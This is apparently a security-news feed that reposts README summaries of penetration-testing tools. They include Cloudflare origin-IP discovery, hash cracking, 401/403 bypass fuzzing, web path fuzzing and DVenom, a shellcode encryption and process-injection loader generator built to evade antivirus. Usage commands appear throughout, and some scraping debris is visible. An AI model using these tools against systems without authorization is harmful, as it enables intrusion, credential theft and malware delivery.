FreshRSS

🔒
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayTools

CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare

By: Zion3R


CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.


Key Features:

  • Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.

  • Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.

  • Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.

  • Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.

With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.

Limitation

infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information. 3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the primary host. Some subdomains may also be protected by Cloudflare. " dir="auto">
- Still in the development phase, sometimes it can't detect the real Ip.

- CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.

1. False Negatives: CloakReveal3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.

2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.

3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the pri mary host. Some subdomains may also be protected by Cloudflare.

This tool is a Proof of Concept and is for Educational Purposes Only.

How to Use:

  1. Run CloudScan with a single command-line argument: the target domain you want to analyze.

     git clone https://github.com/spyboy-productions/CloakQuest3r.git
    cd CloakQuest3r
    pip3 install -r requirements.txt
    python cloakquest3r.py example.com
  2. The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.

  3. If Cloudflare is detected, CloudScan will scan for subdomains and identify their real IP addresses.

  4. You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.

  5. Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.

CloudScan simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.

Run It Online:

Run it online on replit.com : https://replit.com/@spyb0y/CloakQuest3r



PassBreaker - Command-line Password Cracking Tool Developed In Python

By: Zion3R


PassBreaker is a command-line password cracking tool developed in Python. It allows you to perform various password cracking techniques such as wordlist-based attacks and brute force attacks. 

Features

  • Wordlist-based password cracking
  • Brute force password cracking
  • Support for multiple hash algorithms
  • Optional salt value
  • Parallel processing option for faster cracking
  • Password complexity evaluation
  • Customizable minimum and maximum password length
  • Customizable character set for brute force attacks

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/PassBreaker.git
  2. Install the required dependencies:

    pip install -r requirements.txt

Usage

python passbreaker.py <password_hash> <wordlist_file> [--algorithm]

Replace <password_hash> with the target password hash and <wordlist_file> with the path to the wordlist file containing potential passwords.

Options

  • --algorithm <algorithm>: Specify the hash algorithm to use (e.g., md5, sha256, sha512).
  • -s, --salt <salt>: Specify a salt value to use.
  • -p, --parallel: Enable parallel processing for faster cracking.
  • -c, --complexity: Evaluate password complexity before cracking.
  • -b, --brute-force: Perform a brute force attack.
  • --min-length <min_length>: Set the minimum password length for brute force attacks.
  • --max-length <max_length>: Set the maximum password length for brute force attacks.
  • --character-set <character_set>: Set the character set to use for brute force attacks.

Elbette! İşte İngilizce olarak yazılmış başlık ve küçük bir bilgi ile daha fazla kullanım örneği:

Usage Examples

Wordlist-based Password Cracking

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5

This command attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the MD5 algorithm and a wordlist from the "passwords.txt" file.

Brute Force Attack

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 --brute-force --min-length 6 --max-length 8 --character-set abc123

This command performs a brute force attack to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" by trying all possible combinations of passwords with a length between 6 and 8 characters, using the character set "abc123".

Password Complexity Evaluation

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha256 --complexity

This command evaluates the complexity of passwords in the "passwords.txt" file and attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the SHA-256 algorithm. It only tries passwords that meet the complexity requirements.

Using Salt Value

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5 --salt mysalt123

This command uses a specific salt value ("mysalt123") for the password cracking process. Salt is used to enhance the security of passwords.

Parallel Processing

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha512 --parallel

This command performs password cracking with parallel processing for faster cracking. It utilizes multiple processing cores, but it may consume more system resources.

These examples demonstrate different features and use cases of the "PassBreaker" password cracking tool. Users can customize the parameters based on their needs and goals.

Disclaimer

This tool is intended for educational and ethical purposes only. Misuse of this tool for any malicious activities is strictly prohibited. The developers assume no liability and are not responsible for any misuse or damage caused by this tool.

Contributing

Contributions are welcome! To contribute to PassBreaker, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

If you have any questions, comments, or suggestions about PassBreaker, please feel free to contact me:

License

PassBreaker is released under the MIT License. See LICENSE for more information.



C2-Search-Netlas - Search For C2 Servers Based On Netlas

By: Zion3R

C2 Search Netlas is a Java utility designed to detect Command and Control (C2) servers using the Netlas API. It provides a straightforward and user-friendly CLI interface for searching C2 servers, leveraging the Netlas API to gather data and process it locally.


Search for c2 servers based on netlas (8)

Usage

To utilize this terminal utility, you'll need a Netlas API key. Obtain your key from the Netlas website.

After acquiring your API key, execute the following command to search servers:

c2detect -t <TARGET_DOMAIN> -p <TARGET_PORT> -s <API_KEY> [-v]

Replace <TARGET_DOMAIN> with the desired IP address or domain, <TARGET_PORT> with the port you wish to scan, and <API_KEY> with your Netlas API key. Use the optional -v flag for verbose output. For example, to search at the google.com IP address on port 443 using the Netlas API key 1234567890abcdef, enter:

c2detect -t google.com -p 443 -s 1234567890abcdef

Release

To download a release of the utility, follow these steps:

  • Visit the repository's releases page on GitHub.
  • Download the latest release file (typically a JAR file) to your local machine.
  • In a terminal, navigate to the directory containing the JAR file.
  • Execute the following command to initiate the utility:
java -jar c2-search-netlas-<version>.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

Docker

To build and start the Docker container for this project, run the following commands:

docker build -t c2detect .
docker run -it --rm \
c2detect \
-s "your_api_key" \
-t "your_target_domain" \
-p "your_target_port" \
-v

Source

To use this utility, you need to have a Netlas API key. You can get the key from the Netlas website. Now you can build the project and run it using the following commands:

./gradlew build
java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar --help

This will display the help message with available options. To search for C2 servers, run the following command:

java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

This will display a list of C2 servers found in the given IP address or domain.

Support

Name Support
Metasploit
Havoc
Cobalt Strike
Bruteratel
Sliver
DeimosC2
PhoenixC2
Empire
Merlin
Covenant
Villain
Shad0w
PoshC2

Legend:

  • ✅ - Accept/good support
  • ❓ - Support unknown/unclear
  • ❌ - No support/poor support

Contributing

If you'd like to contribute to this project, please feel free to create a pull request.

License

This project is licensed under the License - see the LICENSE file for details.



GISEC Armory Edition 1 Dubai 2024 – Call For Tools is Open

We are excited to announce a groundbreaking partnership between ToolsWatch and GISEC 2024, as they

Black Hat Arsenal 2024 Next Stop Singapore !

Excitement is building in the cybersecurity community as the renowned Black Hat Arsenal gears up

ICS-Forensics-Tools - Microsoft ICS Forensics Framework

By: Zion3R


Microsoft ICS Forensics Tools is an open source forensic framework for analyzing Industrial PLC metadata and project files.
it enables investigators to identify suspicious artifacts on ICS environment for detection of compromised devices during incident response or manual check.
open source framework, which allows investigators to verify the actions of the tool or customize it to specific needs.


Getting Started

These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.

git clone https://github.com/microsoft/ics-forensics-tools.git

Prerequisites

Installing

  • Install python requirements

    pip install -r requirements.txt

Usage

General application arguments:

Args Description Required / Optional
-h, --help show this help message and exit Optional
-s, --save-config Save config file for easy future usage Optional
-c, --config Config file path, default is config.json Optional
-o, --output-dir Directory in which to output any generated files, default is output Optional
-v, --verbose Log output to a file as well as the console Optional
-p, --multiprocess Run in multiprocess mode by number of plugins/analyzers Optional

Specific plugin arguments:

Args Description Required / Optional
-h, --help show this help message and exit Optional
--ip Addresses file path, CIDR or IP addresses csv (ip column required).
add more columns for additional info about each ip (username, pass, etc...)
Required
--port Port number Optional
--transport tcp/udp Optional
--analyzer Analyzer name to run Optional

Executing examples in the command line

 python driver.py -s -v PluginName --ip ips.csv
python driver.py -s -v PluginName --analyzer AnalyzerName
python driver.py -s -v -c config.json --multiprocess

Import as library example

from forensic.client.forensic_client import ForensicClient
from forensic.interfaces.plugin import PluginConfig
forensic = ForensicClient()
plugin = PluginConfig.from_json({
"name": "PluginName",
"port": 123,
"transport": "tcp",
"addresses": [{"ip": "192.168.1.0/24"}, {"ip": "10.10.10.10"}],
"parameters": {
},
"analyzers": []
})
forensic.scan([plugin])

Architecture

Adding Plugins

When developing locally make sure to mark src folder as "Sources root"

  • Create new directory under plugins folder with your plugin name
  • Create new Python file with your plugin name
  • Use the following template to write your plugin and replace 'General' with your plugin name
from pathlib import Path
from forensic.interfaces.plugin import PluginInterface, PluginConfig, PluginCLI
from forensic.common.constants.constants import Transport


class GeneralCLI(PluginCLI):
def __init__(self, folder_name):
super().__init__(folder_name)
self.name = "General"
self.description = "General Plugin Description"
self.port = 123
self.transport = Transport.TCP

def flags(self, parser):
self.base_flags(parser, self.port, self.transport)
parser.add_argument('--general', help='General additional argument', metavar="")


class General(PluginInterface):
def __init__(self, config: PluginConfig, output_dir: Path, verbose: bool):
super().__init__(config, output_dir, verbose)

def connect(self, address):
self.logger.info(f"{self.config.name} connect")

def export(self, extracted):
self.logger.info(f"{self.config.name} export")
  • Make sure to import your new plugin in the __init__.py file under the plugins folder
  • In the PluginInterface inherited class there is 'config' parameters, you can use this to access any data that's available in the PluginConfig object (plugin name, addresses, port, transport, parameters).
    there are 2 mandatory functions (connect, export).
    the connect function receives single ip address and extracts any relevant information from the device and return it.
    the export function receives the information that was extracted from all the devices and there you can export it to file.
  • In the PluginCLI inherited class you need to specify in the init function the default information related to this plugin.
    there is a single mandatory function (flags).
    In which you must call base_flags, and you can add any additional flags that you want to have.

Adding Analyzers

  • Create new directory under analyzers folder with the plugin name that related to your analyzer.
  • Create new Python file with your analyzer name
  • Use the following template to write your plugin and replace 'General' with your plugin name
from pathlib import Path
from forensic.interfaces.analyzer import AnalyzerInterface, AnalyzerConfig


class General(AnalyzerInterface):
def __init__(self, config: AnalyzerConfig, output_dir: Path, verbose: bool):
super().__init__(config, output_dir, verbose)
self.plugin_name = 'General'
self.create_output_dir(self.plugin_name)

def analyze(self):
pass
  • Make sure to import your new analyzer in the __init__.py file under the analyzers folder

Resources and Technical data & solution:

Microsoft Defender for IoT is an agentless network-layer security solution that allows organizations to continuously monitor and discover assets, detect threats, and manage vulnerabilities in their IoT/OT and Industrial Control Systems (ICS) devices, on-premises and in Azure-connected environments.

Section 52 under MSRC blog
ICS Lecture given about the tool
Section 52 - Investigating Malicious Ladder Logic | Microsoft Defender for IoT Webinar - YouTube

Contributing

This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.

When you submit a pull request, a CLA bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.

This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments.

Trademarks

This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow Microsoft's Trademark & Brand Guidelines. Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos are subject to those third-party's policies.



Forbidden-Buster - A Tool Designed To Automate Various Techniques In Order To Bypass HTTP 401 And 403 Response Codes And Gain Access To Unauthorized Areas In The System

By: Zion3R


Forbidden Buster is a tool designed to automate various techniques in order to bypass HTTP 401 and 403 response codes and gain access to unauthorized areas in the system. This code is made for security enthusiasts and professionals only. Use it at your own risk.

  • Probes HTTP 401 and 403 response codes to discover potential bypass techniques.
  • Utilizes various methods and headers to test and bypass access controls.
  • Customizable through command-line arguments.

Install requirements

pip3 install -r requirements.txt

Run the script

python3 forbidden_buster.py -u http://example.com

Forbidden Buster accepts the following arguments:

fuzzing (stressful) --include-user-agent Include User-Agent fuzzing (stressful)" dir="auto">
  -h, --help            show this help message and exit
-u URL, --url URL Full path to be used
-m METHOD, --method METHOD
Method to be used. Default is GET
-H HEADER, --header HEADER
Add a custom header
-d DATA, --data DATA Add data to requset body. JSON is supported with escaping
-p PROXY, --proxy PROXY
Use Proxy
--rate-limit RATE_LIMIT
Rate limit (calls per second)
--include-unicode Include Unicode fuzzing (stressful)
--include-user-agent Include User-Agent fuzzing (stressful)

Example Usage:

python3 forbidden_buster.py --url "http://example.com/secret" --method POST --header "Authorization: Bearer XXX" --data '{\"key\":\"value\"}' --proxy "http://proxy.example.com" --rate-limit 5 --include-unicode --include-user-agent

  • Hacktricks - Special thanks for providing valuable techniques and insights used in this tool.
  • SecLists - Credit to danielmiessler's SecLists for providing the wordlists.
  • kaimi - Credit to kaimi's "Possible IP Bypass HTTP Headers" wordlist.


CryptoChat - Beyond Secure Messaging

By: Zion3R


Welcome to CryptChat - where conversations remain truly private. Built on the robust Python ecosystem, our application ensures that every word you send is wrapped in layers of encryption. Whether you're discussing sensitive business details or sharing personal stories, CryptChat provides the sanctuary you need in the digital age. Dive in, and experience the next level of secure messaging!

  1. End-to-End Encryption: Every message is secured from sender to receiver, ensuring utmost privacy.
  2. User-Friendly Interface: Navigating and messaging is intuitive and simple, making secure conversations a breeze.
  3. Robust Backend: Built on the powerful Python ecosystem, our chat is reliable and fast.
  4. Open Source: Dive into our codebase, contribute, and make it even better for everyone.
  5. Multimedia Support: Not just text - send encrypted images, videos, and files with ease.
  6. Group Chats: Have encrypted conversations with multiple people at once.

  • Python 3.x
  • cryptography
  • colorama

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/CryptoChat.git
  2. Navigate to the project directory:

    cd CryptoChat
  3. Install the required dependencies:

    pip install -r requirements.txt

bind the server to. --port PORT The port number to bind the server to. -------------------------------------------------------------------------- $ python3 client.py --help usage: client.py [-h] [--host HOST] [--port PORT] Connect to the chat server. options: -h, --help show this help message and exit --host HOST The server's IP address. --port PORT The port number of the server." dir="auto">
$ python3 server.py --help
usage: server.py [-h] [--host HOST] [--port PORT]

Start the chat server.

options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to.
--port PORT The port number to bind the server to.
--------------------------------------------------------------------------
$ python3 client.py --help
usage: client.py [-h] [--host HOST] [--port PORT]

Connect to the chat server.

options:
-h, --help show this help message and exit
--host HOST The server's IP address.
--port PORT The port number of the server.

secret key for encryption. (Default=mysecretpassword) -------------------------------------------------------------------------- $ python3 clientE.py --help usage: clientE.py [-h] [--host HOST] [--port PORT] [--key KEY] Connect to the chat server. options: -h, --help show this help message and exit --host HOST The IP address to bind the server to. (Default=127.0.0.1) --port PORT The port number to bind the server to. (Default=12345) --key KEY The secret key for encryption. (Default=mysecretpassword)" dir="auto">
$ python3 serverE.py --help
usage: serverE.py [-h] [--host HOST] [--port PORT] [--key KEY]

Start the chat server.

options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to. (Default=0.0.0.0)
--port PORT The port number to bind the server to. (Default=12345)
--key KEY The secret key for encryption. (Default=mysecretpassword)
--------------------------------------------------------------------------
$ python3 clientE.py --help
usage: clientE.py [-h] [--host HOST] [--port PORT] [--key KEY]

Connect to the chat server.

options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to. (Default=127.0.0.1)
--port PORT The port number to bind the server to. (Default=12345)
--key KEY The secret key for encr yption. (Default=mysecretpassword)
  • --help: show this help message and exit
  • --host: The IP address to bind the server.
  • --port: The port number to bind the server.
  • --key : The secret key for encryption

Contributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.

If you have any questions, comments, or suggestions about CryptChat, please feel free to contact me:



Afuzz - Automated Web Path Fuzzing Tool For The Bug Bounty Projects

By: Zion3R

Afuzz is an automated web path fuzzing tool for the Bug Bounty projects.

Afuzz is being actively developed by @rapiddns


Features

  • Afuzz automatically detects the development language used by the website, and generates extensions according to the language
  • Uses blacklist to filter invalid pages
  • Uses whitelist to find content that bug bounty hunters are interested in in the page
  • filters random content in the page
  • judges 404 error pages in multiple ways
  • perform statistical analysis on the results after scanning to obtain the final result.
  • support HTTP2

Installation

git clone https://github.com/rapiddns/Afuzz.git
cd Afuzz
python setup.py install

OR

pip install afuzz

Run

afuzz -u http://testphp.vulnweb.com -t 30

Result

Table

+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://testphp.vulnweb.com/ |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
| target | path | status | redirect | title | length | content-type | lines | words | type | mark |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+ -----------+----------+
| http://testphp.vulnweb.com/ | .idea/workspace.xml | 200 | | | 12437 | text/xml | 217 | 774 | check | |
| http://testphp.vulnweb.com/ | admin | 301 | http://testphp.vulnweb.com/admin/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
| http://testphp.vulnweb.com/ | login.php | 200 | | login page | 5009 | text/html | 120 | 432 | check | |
| http://testphp.vulnweb.com/ | .idea/.name | 200 | | | 6 | application/octet-stream | 1 | 1 | check | |
| http://testphp.vulnweb.com/ | .idea/vcs.xml | 200 | | | 173 | text/xml | 8 | 13 | check | |
| http://testphp.vulnweb.com/ | .idea/ | 200 | | Index of /.idea/ | 937 | text/html | 14 | 46 | whitelist | index of |
| http://testphp.vulnweb.com/ | cgi-bin/ | 403 | | 403 Forbidden | 276 | text/html | 10 | 28 | folder | 403 |
| http://testphp.vulnweb.com/ | .idea/encodings.xml | 200 | | | 171 | text/xml | 6 | 11 | check | |
| http://testphp.vulnweb.com/ | search.php | 200 | | search | 4218 | text/html | 104 | 364 | check | |
| http://testphp.vulnweb.com/ | produc t.php | 200 | | picture details | 4576 | text/html | 111 | 377 | check | |
| http://testphp.vulnweb.com/ | admin/ | 200 | | Index of /admin/ | 248 | text/html | 8 | 16 | whitelist | index of |
| http://testphp.vulnweb.com/ | .idea | 301 | http://testphp.vulnweb.com/.idea/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+```

Json

{
"result": [
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/workspace.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 12437,
"content_type": "text/xml",
"lines": 217,
"words": 774,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/workspace.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin",
"status": 301,
"redirect": "http://testphp.vulnweb.com/admin/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words ": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "login.php",
"status": 200,
"redirect": "",
"title": "login page",
"length": 5009,
"content_type": "text/html",
"lines": 120,
"words": 432,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/login.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/.name",
"status": 200,
"redirect": "",
"title": "",
"length": 6,
"content_type": "application/octet-stream",
"lines": 1,
"words": 1,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/.name"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/vcs.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 173,
"content_type": "text/xml",
"lines": 8,
"words": 13,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/vcs.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/",
"status": 200,
"redirect": "",
"title": "Index of /.idea/",
"length": 937,
"content_type": "text/html",
"lines": 14,
"words": 46,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "cgi-bin/",
"status": 403,
"redirect": "",
"title": "403 Forbidden",
"length": 276,
"content_type": "text/html",
"lines": 10,
"words": 28,
"type": "folder",
"mark": "403",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/cgi-bin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/encodings.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 171,
"content_type": "text/xml",
"lines": 6,
"words": 11,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/encodings.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "search.php",
"status": 200,
"redirect": "",
"title": "search",
"length": 4218,
"content_type": "text/html",
"lines": 104,
"words": 364,
"t ype": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/search.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "product.php",
"status": 200,
"redirect": "",
"title": "picture details",
"length": 4576,
"content_type": "text/html",
"lines": 111,
"words": 377,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/product.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin/",
"status": 200,
"redirect": "",
"title": "Index of /admin/",
"length": 248,
"content_type": "text/html",
"lines": 8,
"words": 16,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea",
"status": 301,
"redirect": "http://testphp.vulnweb.com/.idea/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea"
}
],
"total": 12,
"targe t": "http://testphp.vulnweb.com/"
}

Wordlists (IMPORTANT)

Summary:

  • Wordlist is a text file, each line is a path.
  • About extensions, Afuzz replaces the %EXT% keyword with extensions from -e flag.If no flag -e, the default is used.
  • Generate a dictionary based on domain names. Afuzz replaces %subdomain% with host, %rootdomain% with root domain, %sub% with subdomain, and %domain% with domain. And generated according to %ext%

Examples:

  • Normal extensions
index.%EXT%

Passing asp and aspx extensions will generate the following dictionary:

index
index.asp
index.aspx
  • host
%subdomain%.%ext%
%sub%.bak
%domain%.zip
%rootdomain%.zip

Passing https://test-www.hackerone.com and php extension will genrate the following dictionary:

test-www.hackerone.com.php
test-www.zip
test.zip
www.zip
testwww.zip
hackerone.zip
hackerone.com.zip

Options

    #     ###### ### ###  ######  ######
# # # # # # # # #
# # # # # # # # # #
# # ### # # # #
# # # # # # # #
##### # # # # # # #
# # # # # # # # #
### ### ### ### ###### ######



usage: afuzz [options]

An Automated Web Path Fuzzing Tool.
By RapidDNS (https://rapiddns.io)

options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-o OUTPUT, --output OUTPUT
Output file
-e EXTENSIONS, --extensions EXTENSIONS
Extension list separated by commas (Example: php,aspx,jsp)
-t THREAD, --thread THREAD
Number of threads
-d DEPTH, --depth DEPTH
Maximum recursion depth
-w WORDLIST, --wordlist WORDLIST
wordlist
-f, --fullpath fullpath
-p PROXY, --proxy PROXY
proxy, (ex:http://127.0.0.1:8080)

How to use

Some examples for how to use Afuzz - those are the most common arguments. If you need all, just use the -h argument.

Simple usage

afuzz -u https://target
afuzz -e php,html,js,json -u https://target
afuzz -e php,html,js -u https://target -d 3

Threads

The thread number (-t | --threads) reflects the number of separated brute force processes. And so the bigger the thread number is, the faster afuzz runs. By default, the number of threads is 10, but you can increase it if you want to speed up the progress.

In spite of that, the speed still depends a lot on the response time of the server. And as a warning, we advise you to keep the threads number not too big because it can cause DoS.

afuzz -e aspx,jsp,php,htm,js,bak,zip,txt,xml -u https://target -t 50

Blacklist

The blacklist.txt and bad_string.txt files in the /db directory are blacklists, which can filter some pages

The blacklist.txt file is the same as dirsearch.

The bad_stirng.txt file is a text file, one per line. The format is position==content. With == as the separator, position has the following options: header, body, regex, title

Language detection

The language.txt is the detection language rule, the format is consistent with bad_string.txt. Development language detection for website usage.

References

Thanks to open source projects for inspiration

  • Dirsearch by by Shubham Sharma
  • wfuzz by Xavi Mendez
  • arjun by Somdev Sangwan


Dvenom - Tool That Provides An Encryption Wrapper And Loader For Your Shellcode

By: Zion3R


Double Venom (DVenom) is a tool that helps red teamers bypass AVs by providing an encryption wrapper and loader for your shellcode.

  • Capable of bypassing some well-known antivirus (AVs).
  • Offers multiple encryption methods including RC4, AES256, XOR, and ROT.
  • Produces source code in C#, Rust, PowerShell, ASPX, and VBA.
  • Employs different shellcode loading techniques: VirtualAlloc, Process Injection, NT Section Injection, Hollow Process Injection.

These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.

  • Golang installed.
  • Basic understanding of shellcode operations.
  • Familiarity with C#, Rust, PowerShell, ASPX, or VBA.

To clone and run this application, you'll need Git installed on your computer. From your command line:

# Clone this repository
$ git clone https://github.com/zerx0r/dvenom
# Go into the repository
$ cd dvenom
# Build the application
$ go build /cmd/dvenom/

After installation, you can run the tool using the following command:

./dvenom -h

  • -e: Specify the encryption type for the shellcode (Supported types: xor, rot, aes256, rc4).
  • -key: Provide the encryption key.
  • -l: Specify the language (Supported languages: cs, rs, ps1, aspx, vba).
  • -m: Specify the method type (Supported types: valloc, pinject, hollow, ntinject).
  • -procname: Provide the process name to be injected (default is "explorer").
  • -scfile: Provide the path to the shellcode file.

To generate c# source code that contains encrypted shellcode.

Note that if AES256 has been selected as an encryption method, the Initialization Vector (IV) will be auto-generated.

./dvenom -e aes256 -key secretKey -l cs -m ntinject -procname explorer -scfile /home/zerx0r/shellcode.bin > ntinject.cs

Language Supported Methods Supported Encryption
C# valloc, pinject, hollow, ntinject xor, rot, aes256, rc4
Rust pinject, hollow, ntinject xor, rot, rc4
PowerShell valloc, pinject xor, rot
ASPX valloc xor, rot
VBA valloc xor, rot

Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.

This project is licensed under the MIT License - see the LICENSE file for details.

Double Venom (DVenom) is intended for educational and ethical testing purposes only. Using DVenom for attacking targets without prior mutual consent is illegal. The tool developer and contributor(s) are not responsible for any misuse of this tool.



WebSecProbe - Web Security Assessment Tool, Bypass 403

By: Zion3R


A cutting-edge utility designed exclusively for web security aficionados, penetration testers, and system administrators. WebSecProbe is your advanced toolkit for conducting intricate web security assessments with precision and depth. This robust tool streamlines the intricate process of scrutinizing web servers and applications, allowing you to delve into the technical nuances of web security and fortify your digital assets effectively.


WebSecProbe is designed to perform a series of HTTP requests to a target URL with various payloads in order to test for potential security vulnerabilities or misconfigurations. Here's a brief overview of what the code does:

  • It takes user input for the target URL and the path.
  • It defines a list of payloads that represent different HTTP request variations, such as URL-encoded characters, special headers, and different HTTP methods.
  • It iterates through each payload and constructs a full URL by appending the payload to the target URL.
  • For each constructed URL, it sends an HTTP GET request using the requests library, and it captures the response status code and content length.
  • It prints the constructed URL, status code, and content length for each request, effectively showing the results of each variation's response from the target server.
  • After testing all payloads, it queries the Wayback Machine (a web archive) to check if there are any archived snapshots of the target URL/path. If available, it prints the closest archived snapshot's information.

Does This Tool Bypass 403 ?

It doesn't directly attempt to bypass a 403 Forbidden status code. The code's purpose is more about testing the behavior of the server when different requests are made, including requests with various payloads, headers, and URL variations. While some of the payloads and headers in the code might be used in certain scenarios to test for potential security misconfigurations or weaknesses, it doesn't guarantee that it will bypass a 403 Forbidden status code.

